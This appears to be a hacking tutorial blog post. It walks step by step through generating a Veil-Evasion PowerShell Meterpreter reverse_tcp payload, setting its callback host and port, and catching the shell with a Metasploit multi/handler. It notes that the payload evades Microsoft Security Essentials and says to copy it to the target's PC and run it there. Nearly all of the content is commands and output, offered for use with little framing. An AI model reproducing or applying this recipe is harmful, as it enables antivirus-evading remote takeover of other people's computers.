powershell_rev_tcp

As we said in the previous tutorial (c/meterpreter), Veil-Evasion is a tool that knows how to create PAYLOADS for the Metasploit tool.
We found that this tool can cause a collision between itself and the MSF tool, and we also found some issues with the Kali system and the Wine installation.
So, we installed the Veil tool on an Ubuntu 16.04 machine that exists in our LAN, and during the PAYLOAD creation process on Veil, we entered the values of our laptop, which runs Kali Linux with MSF on it.
BTW, if you are pen-testing from your office, you can create the PAYLOADS on any machine you want, and in the PAYLOAD values you can route them to any machine you want.
You don’t have to do it on one machine all the time.
As hackers, we can use a few Linux machines at the same time (virtual as well as physical).

We found that Microsoft Security Essentials does not alert about Veil’s PAYLOADS, but we haven’t tried it with other AVs.

[LET’S MAKE IT WORK]

#1) Open a terminal and navigate to the Veil tool
assault@ubuntuvm:~$ cd Tools/Veil-evasion
assault@ubuntuvm:~/Tools/Veil-evasion$ ls
*Now, let’s locate the .py file & type*
assault@ubuntuvm:~/Tools/Veil-evasion$ sudo ./Veil-Evasion.py

*And we will get this output – the command*

[screenshot: veil-1]

*Veil tool*

[screenshot: veil-2]

Let’s continue…

#2) Inside Veil, let’s type one by one
[menu>>]: use powershell/meterpreter/rev_tcp

*We will get this output*

[screenshot: veilp-1]

*Let’s set up the parameters of our Kali machine*

[powershell/meterpreter/rev_tcp>>]: set LHOST 192.168.50.15
[i] LHOST => 192.168.50.15
[powershell/meterpreter/rev_tcp>>]: set LPORT 4444
[i] LPORT => 4444

*Like this*

[screenshot: veilp-2]

*Type*

[powershell/meterpreter/rev_tcp>>]: generate

*And we will get this output*

[screenshot: rev_http4]
*Let’s pick a name for our new PAYLOAD*
*The name will be: hack_by_the_powershell_process (for example)*

[>] Please enter the base name for output files (default is ‘payload’): hack_by_the_powershell_process

*We will get this output*

[screenshot: veilp-3]

*OK, let’s analyze the output*

  • Language – the language it is written in
  • Payload – the type of our payload (in our case: reverse_tcp)
  • Required Options – the parameters of our payload
  • Payload file – the path of the .bat file
  • Handler file – the path of the handler (for the MSF tool)

It means that we can run the command: msfconsole -r hack_by_the_powershell_process1_handler.rc from this path:
assault@hackbook:~/usr/share/veil-output/handlers$
*And MSF will run the payload immediately*
*In our case we are using 2 separate machines for this hack, so we will ignore this command (just for now)*
*Now, let’s copy the PAYLOAD to our target*

[screenshot: veilp-4]

#3) Let’s move to the Kali machine and open Metasploit with the command
assault@hackbook:~$ sudo msfconsole

*Inside MSF, type one by one*

msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.50.15
LHOST => 192.168.50.15
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set RHOST 192.168.50.7
RHOST => 192.168.50.7
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

*Like this*

[screenshot: veil-7]

msf exploit(handler) > show options
*If everything looks OK in the options area, type exploit*

msf exploit(handler) > exploit

*Now, what is left to do is to run the payload on the target’s PC*


ENJOY! 🙂

Here is an example by Gamer Forever